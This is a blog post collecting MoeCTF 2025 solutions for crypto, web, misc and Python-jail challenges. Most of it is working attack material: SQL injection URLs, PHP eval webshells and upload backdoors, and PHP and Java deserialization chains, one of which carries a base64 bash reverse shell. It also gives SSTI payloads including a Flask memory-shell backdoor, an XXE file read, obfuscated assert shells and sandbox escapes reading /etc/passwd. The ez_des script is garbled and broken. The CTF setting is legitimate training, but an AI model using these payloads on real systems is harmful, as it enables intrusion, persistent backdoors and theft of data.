Moectf2025 Web、Misc 与 Crypto 解题思路汇总 | 极客日志

Pythonjava算法

Moectf2025 Web、Misc 与 Crypto 解题思路汇总

综述由AI生成Moectf2025 竞赛解题总结，涵盖 Web、Misc、Crypto 及 Reverse 方向。Crypto 涉及 ElGamal、DES 解密及 BSGS 算法；Web 包含 SQL 注入、RCE、反序列化漏洞利用及 SSTI 绕过；Misc 涉及 LSB 隐写、图片隐写、PDF 密码破解及压缩包明文攻击；Reverse 重点讲解 Java 对象序列化链构造。文中提供了详细的 Python 脚本、HTTP 请求包及关键代码片段，帮助理解各题型解法。

灵魂摆渡发布于 2026/4/6更新于 2026/5/2347 浏览

moectf2025:

签到：

提示里面有

---> moectf{Welcome_to_MoeCTF_2025} <---

Crypto

入门：

#!/usr/bin/env python3 # decrypt_elgamal.py # Requires pycryptodome (for Crypto.Util.number) # pip install pycryptodome from Crypto.Util.number import inverse, long_to_bytes # --- paste the parameters exactly as integers below --- p = 11540963715962144951763578255357417528966715904849014985547597657698304891044841099894993117258279094910424033273299863589407477091830213468539451196239863 g = 2 y = 8313424783366011287014623582773521595333285291380540689467073212212931648415580065207081449784135835711205324186662482526357834042013400765421925274271853 c1 = 6652053553055645358275362259554856525976931841318251152940464543175108560132949610916012490837970851191204144757409335011811874896056430105292534244732863 c2 = 2314913568081526428247981719100952331444938852399031826635475971947484663418362533363591441216570597417789120470703548843342170567039399830377459228297983 x = 8010957078086554284020959664124784479610913596560035011951143269559761229114027738791440961864150225798049120582540951874956255115884539333966429021004214 # -------------------------------------------------- def elgamal_decrypt(p, c1, c2, x): # compute s = c1^x mod p s = pow(c1, x, p) # compute s^{-1} mod p s_inv = inverse(s, p) # recover message integer m m = (c2 * s_inv) % p return m if __name__ == "__main__": m = elgamal_decrypt(p, c1, c2, x) try: flag_bytes = long_to_bytes(m) # print raw bytes repr and attempt decode as utf-8 print("Recovered bytes (repr):", repr(flag_bytes)) try: print("Recovered as UTF-8 string:") print(flag_bytes.decode('utf-8')) except Exception: print("Note: could not decode as UTF-8. Inspect bytes above.") except Exception as e: print("Error converting integer to bytes:", e) print("Integer m:", m)

ez_des

from Crypto.Cipher import DES import itertools, string, time, sys, re ciphertext = b'\xe6\x8b\x0c\x8m\t?\x1d\xf6\x99sA>\xce \rN\x83z\xa0\xdc{\xbc\xb8X\xb2\xe2q\xa4"\xfc\x07' prefix = 'ezdes' chars = string.ascii_letters + string.digits + string.punctuation start = time.time() tried = 0 found = None pattern = re.compile()

相关免费在线工具

加密/解密文本
使用加密算法（如AES、TripleDES、Rabbit或RC4）加密和解密文本明文。在线工具，加密/解密文本在线工具，online
Keycode 信息
查找任何按下的键的javascript键代码、代码、位置和修饰符。在线工具，Keycode 信息在线工具，online
Escape 与 Native 编解码
JavaScript 字符串转义/反转义；Java 风格 \uXXXX（Native2Ascii）编码与解码。在线工具，Escape 与 Native 编解码在线工具，online
JavaScript / HTML 格式化
使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。在线工具，JavaScript / HTML 格式化在线工具，online
JavaScript 压缩与混淆
Terser 压缩、变量名混淆，或 javascript-obfuscator 高强度混淆（体积会增大）。在线工具，JavaScript 压缩与混淆在线工具，online
Gemini 图片去水印
基于开源反向 Alpha 混合算法去除 Gemini/Nano Banana 图片水印，支持批量处理与下载。在线工具，Gemini 图片去水印在线工具，online

# def bsgs(base, target, modulus): # """ # Baby-Step Giant-Step 解离散对数：base^x ≡ target (mod modulus) # 返回最小的正整数 x # """ # base %= modulus # target %= modulus # # m = int(modulus ** 0.5) + 1 # # 存储 base^j -> j # table = {} # e = 1 # for j in range(m): # if e in table: # break # table[e] = j # e = (e * base) % modulus # # # 计算 base^(-m) mod modulus # factor = pow(base, modulus - 1 - m, modulus) # # gamma = target # for i in range(m): # if gamma in table: # return i * m + table[gamma] # gamma = (gamma * factor) % modulus # return None # # # def main(): # m = 10000000000099 # base = 10 # target = 1030627 # 1 + 114514 * 9 # # N = bsgs(base, target, m) # print(f"最小的 N = {N}") # # # 验证 # Rn = (pow(10, N, 9 * m) - 1) // 9 # if Rn % m == 114514: # print("验证成功！") # else: # print("验证失败！") # # # if __name__ == "__main__": # main() from math import isqrt import sys M = 10000000000099 target = (9 * 114514 + 1) % M # 1030627 g = 10 % M def bsgs(g, target, mod): """Solve g^x = target (mod mod), return x or None""" if target == 1: return 0 m = isqrt(mod) + 1 baby = {} cur = 1 for j in range(m): if cur not in baby: baby[cur] = j cur = (cur * g) % mod factor = pow(g, m, mod) cur = target for i in range(m+1): if cur in baby: return i * m + baby[cur] cur = (cur * factor) % mod return None def multiplicative_order(g, mod): """Find order of g mod mod (brute force factorization of totient not possible here, so fallback)""" # We cannot factor M-1 directly (too large), so fallback to cycle detection. seen = {} cur = 1 for i in range(1, 10**7): # limit for safety cur = (cur * g) % mod if cur == 1: return i if cur in seen: break seen[cur] = i return None # Step 1: BSGS N0 = bsgs(g, target, M) print("One solution N0 =", N0) # Step 2: Try to confirm with direct computation check_val = pow(g, N0, M) print("10^N0 mod M =", check_val, "expected", target) print("Check (10^N0-1)/9 mod M =", ((check_val - 1) * pow(9, -1, M)) % M) # Step 3: Try to find another solution by exploring multiples of order ord10 = multiplicative_order(g, M) print("Order of 10 mod M (maybe truncated) =", ord10) if ord10: alt = (N0 + ord10) % (M-1) print("Another candidate N =", alt) print("10^alt mod M =", pow(10, alt, M)) 7718260004383 2281743386085

# 依旧 ai 神力 from math import isqrt def BSGS(a, b, p): a %= p b %= p if b == 1: return 0 n = isqrt(p) + 1 baby = {} cur = 1 # baby steps for j in range(n): if cur not in baby: baby[cur] = j cur = (cur * a) % p # a^{-n} an = pow(a, n * (p - 2), p) # 因为 p 可能是质数，也可能不是，但先尝试费马逆元 cur = b for i in range(n): if cur in baby: return i * n + baby[cur] cur = (cur * an) % p return None p = 100000000000099 a = 13 b = 114514 x = BSGS(a, b, p) print("Flag:", x)

获得玉简碎片：bW9lY3Rme0Mw 获得玉简碎片：bjZyNDd1MTQ3 获得玉简碎片：MTBuNV95MHVy 获得玉简碎片：X2g3N1BfbDN2 获得玉简碎片：M2xfMTVfcjM0 获得玉简碎片：bGx5X2gxOWAh 获得玉简碎片：fQ==

moectf{C0n6r47u14710n5_y0ur_h77P_l3v3l_15_r34lly_h19h!}

moectf{@1L-1npuT-IS-mal1Ci0uSfe8bf5}

moectf{W31c0Me-To_SQl-lNJEcTiOnll5cf658e}

/flag.php?a=QNKCDZO&b=240610708

moectf{Md5-1S-Not_5af3l!275cede1962}

http://192.168.119.1:37984/?username=0&password='||%20-1%23 返回 admin http://192.168.119.1:37984/?username=0&password='||%200%23 无返回 盲注

http://192.168.119.1:37984/?username=1'/**/Union/**/select/**/database(),2%23&password=1'union/**/select/**/1,2,3||'1

Welcome flag,users http://192.168.119.1:37984/?username=1'/**/Union/**/select/**/group_concat(table_name),2/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema='user'%23&password=1

value http://192.168.119.1:37984/?username=1'/**/Union/**/select/**/group_concat(column_name),2/**/FROM/**/information_schema.columns/**/WHERE/**/table_schema='user'and/**/table_name='flag'%23&password=1

Welcome moectf{uN1On-6@sEd-sQ11_FtWl19bb9af2f} http://192.168.119.1:37984/?username=1'/**/Union/**/select/**/*,2/**/FROM/**/user.flag%23&password=1

128.0.0.1;echo "<?php eval(\$_POST[2]);?>" > ./2.php

from itertools import permutations letters = ['m', 'n', 'o', 'p', 'q'] with open('param.txt', 'w', encoding='utf-8') as f: for p in permutations(letters): f.write(''.join(p) + '\n') # 每个排列写一行 print("已生成 param.txt，总数：", 5*4*3*2*1)

<?php echo "flag 就在这了，看不到吗，是老弟境界不够吧"; //moectf{546b1e43-2a08-3a50-f287-1c5d3b7f53bd}

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [<!ENTITY file SYSTEM "file:///flag.txt">]> <root><解析>&file;</解析></root>

http://192.168.119.1:31059/get_challenge?count=9

http://192.168.119.1:31059/verify

import requests BASE_URL = "http://192.168.119.1:31059" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36", "Accept": "*/*", "Referer": f"{BASE_URL}/", "Origin": BASE_URL, } def main(): with requests.Session() as s: s.headers.update(HEADERS) # 第一步：获取 challenge resp = s.get(f"{BASE_URL}/get_challenge?count=9") resp.raise_for_status() data = resp.json() numbers, token = data["numbers"], data["token"] print(f"获取到的数字：{numbers}, token: {token}") # 第二步：提交答案 resp = s.post(f"{BASE_URL}/verify", json={"answers": numbers, "token": token}) if resp.status_code == 200: result = resp.json() if result.get("correct"): print("破译成功，flag:", result.get("flag")) else: print("破译失败:", result.get("message")) else: print("POST /verify 仍返回状态码:", resp.status_code) if __name__ == "__main__": main()

moectf{e2619f6f-7b50-fa3b-1bed-58f2e4443417}

<FilesMatch "webshell">
Sethandler application/x-httpd-php
</FilesMatch>

<?php $f= fopen ("test.php","w") ; fputs ($f,'<?php phpinfo();?>'); ?>

POST /upload.php HTTP/1.1 Host: 192.168.119.1:6661 Content-Length: 464 Cache-Control: max-age=0 Origin: http://192.168.119.1:6661 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQcda1U35nS09yTb Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.119.1:6661/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive ------WebKitFormBoundaryFQcda1U35nS09yTb Content-Disposition: form-data; name="upload_file"; filename="jingzheng.php" Content-Type: application/octet-stream <?php $file = fopen("/var/www/html/uploads/shell.php","w"); $payload="<?php phpinfo();@eval(\$_POST[1]);?>"; fwrite($file,$payload); fclose($file); ?> ------WebKitFormBoundaryFQcda1U35nS09yTb Content-Disposition: form-data; name="submit" ä¸ä¼ ------WebKitFormBoundaryFQcda1U35nS09yTb-- 请求包： GET /uploads/jingzheng.php HTTP/1.1 Host: 192.168.119.1:6661 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive 1=system('nl /f*'); 1 moectf{bc357036-4ed6-249c-7cc6-3f376e5c2b62}

<?php highlight_file(__FILE__); class A { public $a; function __destruct() { eval($this->a); } } $aa = new A(); $aa->a = "system('ls /');"; echo serialize($aa);

http://192.168.119.1:7617/?a=O:1:"A":1:{s:1:"a";s:17:"system('nl /f*');";}

public function __construct() {
$this->name = new PersonB();
}

<?php highlight_file(__FILE__); class PersonA { public $name; public function __construct() { $this->name = new PersonB(); } function __wakeup() { $name=$this->name; $name->work(); } } class PersonB { public $name; public function __construct() { $this->name = "system('ls /');"; } } $A = new PersonA(); echo serialize($A);

http://192.168.119.1:50568/?person=O:7:"PersonA":1:{s:4:"name";O:7:"PersonB":1:{s:4:"name";s:17:"system('nl /f*');";}} } 1 moectf{bbcb4065-8bff-8187-20b0-7823c2c47baa}

用不到 B 因为是 public 属性，直接从 A 到 C 调用它的__Check 函数就行了 <?php highlight_file(__FILE__); class Person { public $name; public $id; public $age; public function __invoke($id) { $name = $this->id; $name->name = $id; $name->age = $this->name; } } class PersonA extends Person { } class PersonC extends Person { public function __Check($age) { $name = $this->name; $name($age); } public function __wakeup() { $age = $this->age; $name = $this->id; $name->age = $age; $name($this); } } $a = new PersonA(); $a->name=new PersonC(); $a->id="__Check"; $a->age="ls /"; $a->name->name="system"; echo serialize($a); http://192.168.119.1:14551/?person=O:7:%22PersonA%22:3:{s:4:%22name%22;O:7:%22PersonC%22:3:{s:4:%22name%22;s:6:%22system%22;s:2:%22id%22;N;s:3:%22age%22;N;}s:2:%22id%22;s:7:%22__Check%22;s:3:%22age%22;s:6:%22nl /f*%22;}

http://192.168.119.1:53031/ ?person=O:7:"PersonA":3:{s:4:"name";O:7:"PersonC":3:{s:4:"name";s:8:"passthru";s:2:"id";N;s:3:"age";N;}s:2:"id";s:5:"check";s:3:"age";s:4:"ls /";}

$a = new PersonA(); $a->name=new PersonC(); $a->id="check"; $a->age="ls"; $a->name->name="passthru"; echo serialize($a); moectf{5f3195b3-0a8d-6403-7b21-a73b0b8f04f8} NULL

{{(ez.__eq__.__globals__.sys.modules.os.popen('nl /f*')).read()}}"

blacklist = ["__", "global", "{{", "}}"]

{%print lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u0067\u0065\u0074")("os")|attr("\u0070\u006f\u0070\u0065\u006e")("ls /")|attr("\u0072\u0065\u0061\u0064")()%}

{%print lipsum |attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f") |attr("\u0067\u0065\u0074")("os") |attr("\u0070\u006f\u0070\u0065\u006e")("nl /f*") |attr("\u0072\u0065\u0061\u0064")()%}

打内存马 {{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__('flask').make_response(__import__('os').popen(request.args.get('cmd')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

http://192.168.119.1:40701/?cmd=echo%20`find / -user root -perm -4000 -print 2>/dev/null`

http://192.168.119.1:43115/?cmd=echo "$(base64 /usr/bin/rev)"

package com.example.demo.controller; import com.example.demo.Dog.Dog; import com.example.demo.Dog.DogService; import java.io.*; import java.lang.reflect.Field; import java.util.Base64; import java.util.HashMap; import java.util.Map; public class Exp { public static String serialize(Object obj) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(obj); return Base64.getEncoder().encodeToString(baos.toByteArray()); } public static void deserialize(String base64Data) throws IOException, ClassNotFoundException { ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64Data)); ObjectInputStream ois = new ObjectInputStream(bais); ois.readObject(); } public static Dog setDog(Object i,String m,Class[] p,Object[] a) throws Exception { Dog dog = new Dog(2,"guanfangwp","guanfangwp",2); Field input = Dog.class.getDeclaredField("object"); input.setAccessible(true); input.set(dog,i); Field methodName = Dog.class.getDeclaredField("methodName"); methodName.setAccessible(true); methodName.set(dog,m); Field paramTypes = Dog.class.getDeclaredField("paramTypes"); paramTypes.setAccessible(true); paramTypes.set(dog,p); Field args = Dog.class.getDeclaredField("args"); args.setAccessible(true); args.set(dog,a); return dog; } public static void main(String[] args) throws Exception { Map<Object,Object> map = new HashMap<>(); Dog dog1 = setDog(Runtime.class,"getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}); Dog dog2 = setDog(Runtime.class,"invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}); Dog dog3 = setDog(Runtime.class,"exec",new Class[]{String.class},new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"}); DogService dogService = new DogService(); Field dogs = dogService.getClass().getDeclaredField("dogs"); dogs.setAccessible(true); Map<Integer, Dog> dogs2 = (Map<Integer, Dog>) dogs.get(dogService); Dog dog4 = setDog(dogService,"chainWagTail",new Class[]{},new Object[]{}); dogs2.put(1,dog1); dogs2.put(2,dog2); dogs2.put(3,dog3); map.put(dog4,123); String gfwp = serialize(map); System.out.println(gfwp); // deserialize(gfwp); } }

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert'; $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST'; $___=$$__; $_($___[_]); // assert($_POST[_]); _=system('ls /') _=system('nl /f*') moectf{784ac8cf-bef7-9446-b80b-06554c169b8a}

POST /?shell=?%3E%3C?=`.+/???/????????[?-[]`;?> HTTP/1.1 Host: 192.168.119.1:1120 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: session=.eJxFy0EOQDAQBdC7_PVEqI7Sq4hItRMSVEKtxN2JjcVbvgt-cssicRTYC34XlyT0LsEWhutcseEq040qTEmI5zrIfsC2igzlH6aSatIdIW2zRFj88X29VM6HgRXu-wHRux5L.aMlYHA.XI9fo45n9mZaKDRA-eDeZkkMN8U Connection: keep-alive Content-Type:multipart/form-data;boundary=--------Rsecret2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 128 ----------Rsecret2 Content-Disposition:form-data;name="file";filename="Rsecret2.txt" #!/bin/sh nl /f* ----------Rsecret2--

moectf{ecb63443-554c-e769-a68e-e99272a3c536}

java -jar demo.jar --server.port=9090

└─# echo "bW9lY3Rme0xTQl8xc19zMF8xbnQzcmVzdDFuZyEhc2o5d2R9" | base64 -d moectf{LSB_1s_s0_1nt3rest1ng!!sj9wd}

moectf{d3codiNG_SStV_reQu1REs-PATI3nC3}

..-. .-.. .- --. .. ... ---... .... .- .-.. ..-. ..--.- .-. .- -.. .. --- ..--.- .. -. ..--.- -..- -.. ..- FLAGIS:HALF_RADIO_IN_XDU HALF_RADIO_IN_XDU

moectf{now_you_have_mastered_enchanting}

zlib-flate 不接受直接在命令行写输入文件作为参数，它只能从 标准输入 (stdin) 读取数据，然后把结果输出到 标准输出 (stdout)。 zlib-flate -uncompress < '/root/misc/_ez_png.png.extracted/3E.zlib' > 123 zlib-flate -uncompress < '/root/misc/_ez_png.png.extracted/DB7C7.zlib' > 12

moectf{h1DdEn_P4YlOaD_IN-Id4T}

StegSolve 找第 12 帧

用户把 UTF-8 编码的文本用 GBK/GB18030（Windows 下常说的'ANSI'）去解释/保存了一次，导致字符被错误地映射为这些像 锝、綇 这样的字符。要复原，思路是把当前字符串当作 GBK 字节序列再按 UTF-8 解回来，恢复出原始字符（此次得到的是全角拉丁字母，需要再做全角→半角规范化）。

import unicodedata # 读取 1.txt 里的乱码（UTF-8 读） with open("C:/Users/Rsecret2/Desktop/nothing/flag.txt", "r", encoding="utf-8") as f: s = f.read() # 关键：当作 GBK 字节再解成 UTF-8 fixed = s.encode("gbk", errors="replace").decode("utf-8", errors="replace") # 转为半角并取第一段作为 flag flag_halfwidth = unicodedata.normalize("NFKC", fixed).split()[0] print("恢复后的完整文本：") print(fixed) print("\n半角 flag：") print(flag_halfwidth)

moectf{upI0@d-l0G_TO-DeCrYPT_uploAD}

import zipfile import io # 保存密码的文件 output_file = "pass.txt" # 递归函数，用于处理嵌套 zip def extract_passwords(zip_bytes, level=1): passwords = [] with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z: for name in z.namelist(): if name.endswith(".zip"): # 读取子 zip 文件的二进制内容 sub_zip_bytes = z.read(name) # 递归调用 passwords.extend(extract_passwords(sub_zip_bytes, level + 1)) elif name.endswith("pwd.txt"): content = z.read(name).decode('utf-8').strip() # 提取密码部分 if "The password is:" in content: pwd = content.split("The password is:")[1].strip() passwords.append(pwd) return passwords # 主程序 if __name__ == "__main__": all_passwords = [] with open("password.zip", "rb") as f: zip_bytes = f.read() all_passwords = extract_passwords(zip_bytes) # 保存到文件 with open(output_file, "w") as f: for pwd in all_passwords: f.write(pwd + "\n") print(f"已提取 {len(all_passwords)} 个密码到 {output_file}")

a296a5ec1385f394e8cb

This program cannot be run in DOS mode. 在明文.exe 中

#准备明文 echo -n "0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000" | xxd -r -ps > mingwen time bkcrack -C nc64.zip -c 明文.exe -p mingwen -o 64

┌──(root㉿kali)-[~/misc] └─# time bkcrack -C flag.zip -c "<e6><98><8e><e6><96><87>.exe" -p mingwen -o 64 bkcrack 1.8.0 - 2025-08-18 [23:02:03] Z reduction using 56 bytes of known plaintext 100.0 % (56 / 56) [23:02:04] Attack on 143281 Z values at index 71 Keys: eec878a3 6808e48f 3aa41bd8 73.3 % (105033 / 143281) Found a solution. Stopping. You may resume the attack with the option: --continue-attack 105033 [23:03:24] Keys eec878a3 6808e48f 3aa41bd8 real 81.08s user 480.99s sys 0.14s cpu 593%

bkcrack -C flag.zip -c "<e6><98><8e><e6><96><87>.exe" -k eec878a3 6808e48f 3aa41bd8 -d 3.exe

moectf{Y0u_h4v3_cho5en_7h3_r1ght_z1pf1le!!uysdgfsad}

┌──(root㉿kali)-[~/misc] └─# git log -- flag.txt commit 249ff41401736165cd4514cee7afcd31ecfe7d09 (HEAD -> master) Author: test <test@example.com> Date: Tue Aug 19 22:33:29 2025 +0800 flag ┌──(root㉿kali)-[~/misc] └─# git restore --source=HEAD --staged --worktree -- flag.txt git show 249ff41:flag.txt > new_flag.txt git show 249ff41401736165cd4514cee7afcd31ecfe7d09

:@(s<"A3F:89x541Ux[<
:@(s<"A3F:89x541Ux\[<
BrainFuck 解码:moectf{nOW_YoU-h4V3_UNlocKED-VOlumE}

from pwn import * host = "192.168.119.1" port = 11908 # 连接远程服务 r = remote(host, port) # 打印服务发送的第一条信息（通常是验证码提示） print(r.recvline().decode()) # 直接进入交互模式，不做任何处理 r.interactive() #/proc/self/environ

def chall(): user_input = input("Give me your code: ") # 过滤关键字 forbidden_keywords = ['import', 'eval', 'exec', 'open', 'file'] for keyword in forbidden_keywords: if keyword in user_input: print(f"Forbidden keyword detected: {keyword}") return result = eval(user_input)

先 breakpoint() 再 拿交互 shell 就行了 __import__('os').system('sh') cat /tmp/f* moectf{49943a91-751a-2c66-7c55-4ccf0aab8a2c}

def chall(): user_input = input("Give me your code: ") # 过滤关键字 forbidden_keywords = ['import', 'eval', 'exec', 'open', 'file'] for keyword in forbidden_keywords: if keyword in user_input: print(f"Forbidden keyword detected: {keyword}") return # 过滤特殊字符 forbidden_chars = ['.', '_', '[', ']', "'", '"'] for char in forbidden_chars: if char in user_input: print(f"Forbidden character detected: {char}") return result = eval(user_input)

Please enter the reverse of 'OM43JUES' to continue: seuj34mo Give me your code: breakpoint() --Return-- > <string>(1)<module>()->None (Pdb) __import__('os').system('sh') ls main.py wrapper.sh cat /tmp/f* moectf{45ef2f8e-4918-910c-13b4-506bc95f022d}

def chall(): user_input = input("Give me your code: ") try: result = eval(user_input, {"__builtins__": None}, {}) # Hint: When __builtins__ is None, you need to be more creative... print("Code executed successfully!") if result is not None: print(f"Return value: {result}") except Exception as e: print(f"Execution error: {type(e).__name__}: {e}")

Please enter the reverse of 'NWWBJCXE' to continue: excjbwwn Give me your code: ().__class__.__mro__[1].__subclasses__()[155] Code executed successfully! Return value: <class 'os._wrap_close'> Please enter the reverse of 'Y5NAMEEB' to continue: Please enter the reverse of 'G7MTLZXA' to continue: axzltm7g Give me your code: ().__class__.__mro__[1].__subclasses__()[155].__init__.__globals__['popen']('cat /tmp/f*').read() Code executed successfully! Return value: moectf{406fe97a-aeb3-0b20-5902-8e00148ba1f6} ().__class__.__mro__[1].__subclasses__()[155].__init__.__globals__['popen']('cat /tmp/f*').read()

https://ihsvcpub.us-west-1.clawcloudrun.com/2025/05/10/2025-minil-wp/ builtins.exec("builtins.__import__('os').system('ls')")

def f(): global x, frame frame = x.gi_frame.f_back.f_back.f_globals yield x = f() x.send(None) raise Exception(frame) #base64

__builtins__['list'] = lambda x: ['import', 'time.sleep', 'builtins.input', 'builtins.input/result','exec', 'compile', 'object.__getattr__'] __builtins__['len'] = lambda x: 0 def f(): global x, frame frame = x.gi_frame.f_back.f_back.f_globals yield x = f() x.send(None) if frame['__builtins__']: print(1)

def f(): global x, frame frame = x.gi_frame.f_back.f_back.f_globals yield x = f() x.send(None) raise Exception(frame['__builtins__']['__import__']('os').popen('cat /etc/passwd').read())

https://www.tremse.cn/2025/05/15/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/#pyboxminil-2025 直接梭哈 list=lambda x:True len=lambda x:False try: raise Exception except Exception as e: globals = e.__traceback__.tb_frame.f_back.f_globals globals['RestrictedNodeVisitor'].visit_Attribute=lambda x,y:None os = globals["sys"].modules["os"] os.system("cat /tmp/f*")

参考文章 https://pid-blog.com/article/noval-pyjail-tricks

class Foo: bar = 114514 foo = Foo() match foo: case Foo(bar=val): # Foo 为 foo 对应的类，可用 object 替换 print(val) # val 即为 foo.bar

def f(): global x, frame # frame = x.gi_frame match x: case object(gi_frame=val): frame = val # while frame.f_back: # 向上回溯到最外层 # frame = frame.f_back tmp = frame while tmp: frame = tmp match frame: case object(f_back=val): tmp = val yield x = f() # x.send(None) match x: case object(send=val): val(None) # builtins = frame.f_globals['__builtins__'] match frame: # type: ignore 防止 Pylance 报错，因为 frame 是动态生成的 case object(f_globals=val): builtins = val['__builtins__'] # getattr = builtins.getattr # 恢复 getattr 方法，从而避免直接访问 __import__ 属性 match builtins: case object(getattr=val): myGetattr = val myGetattr(myGetattr(builtins, '__import__')('os'),('system'))('sh')

Moectf2025 Web、Misc 与 Crypto 解题思路汇总

moectf2025:

签到：

Crypto

入门：

ez_des

微信扫一扫，关注极客日志

更多推荐文章

相关免费在线工具

ezBSGS：

web:

111

签到

第一章 神秘的手镯:

第二章 初识金曦玄轨

第三章 问剑石！篡天改命！

第四章 金曦破禁与七绝傀儡阵

1:

2:

3:

4:

5:

6:

7:

第五章 打上门来！

第六章 藏经禁制？玄机初探！

第七章 灵蛛探穴与阴阳双生符

第八章 天衍真言，星图显圣：

Moe 笑传之猜猜爆

222

第九章 星墟禁制·天机问路

第十章 天机符阵

第十一章 千机变·破妄之眼

这是...Webshell？:

第十章 天机符阵_revenge

摸金偶遇 FLAG，拼尽全力难战胜

第十二章 玉魄玄关·破妄

第十三章 通幽关·灵纹诡影

第十四章 御神关·补天玉碑

333

神秘的手镯_revenge

第十五章 归真关·竞时净魔

第十六章 昆仑星途

第十七章 星骸迷阵·神念重构

第十八章 万卷诡阁·功法连环

第十九章 星穹真相·补天归源

第十九 reverse

第二十章 幽冥血海·幻语心魔

第二十一章 往生漩涡·言灵死局

第二十二章 血海核心·千年手段

第二十三章 幻境迷心·皇陨星沉 (大结局)

这是...Webshell

这是...Webshell_reverse？

渗透

misc:

111

ez_LSB:

SSTV:

捂住一只耳:

Enchantment：

ez_png:

222

Rush

ez_锟斤拷????

encrypted_pdf

ez_ssl:

万里挑一

333

2048_master

weird_photo

WebRepo

Encrypted volume

444

Pyjail 0

Pyjail 1

Pyjail 2

Pyjail 3

Pyjail 4

Pyjail 5

微信扫一扫，关注极客日志

第一章神秘的手镯:

第二章初识金曦玄轨

第三章问剑石！篡天改命！

第四章金曦破禁与七绝傀儡阵

第五章打上门来！

第六章藏经禁制？玄机初探！

第七章灵蛛探穴与阴阳双生符

第八章天衍真言，星图显圣：

第九章星墟禁制·天机问路

第十章天机符阵

第十一章千机变·破妄之眼

第十章天机符阵_revenge

第十二章玉魄玄关·破妄

第十三章通幽关·灵纹诡影

第十四章御神关·补天玉碑

第十五章归真关·竞时净魔

第十六章昆仑星途

第十七章星骸迷阵·神念重构

第十八章万卷诡阁·功法连环

第十九章星穹真相·补天归源

第二十章幽冥血海·幻语心魔

第二十一章往生漩涡·言灵死局

第二十二章血海核心·千年手段

第二十三章幻境迷心·皇陨星沉 (大结局)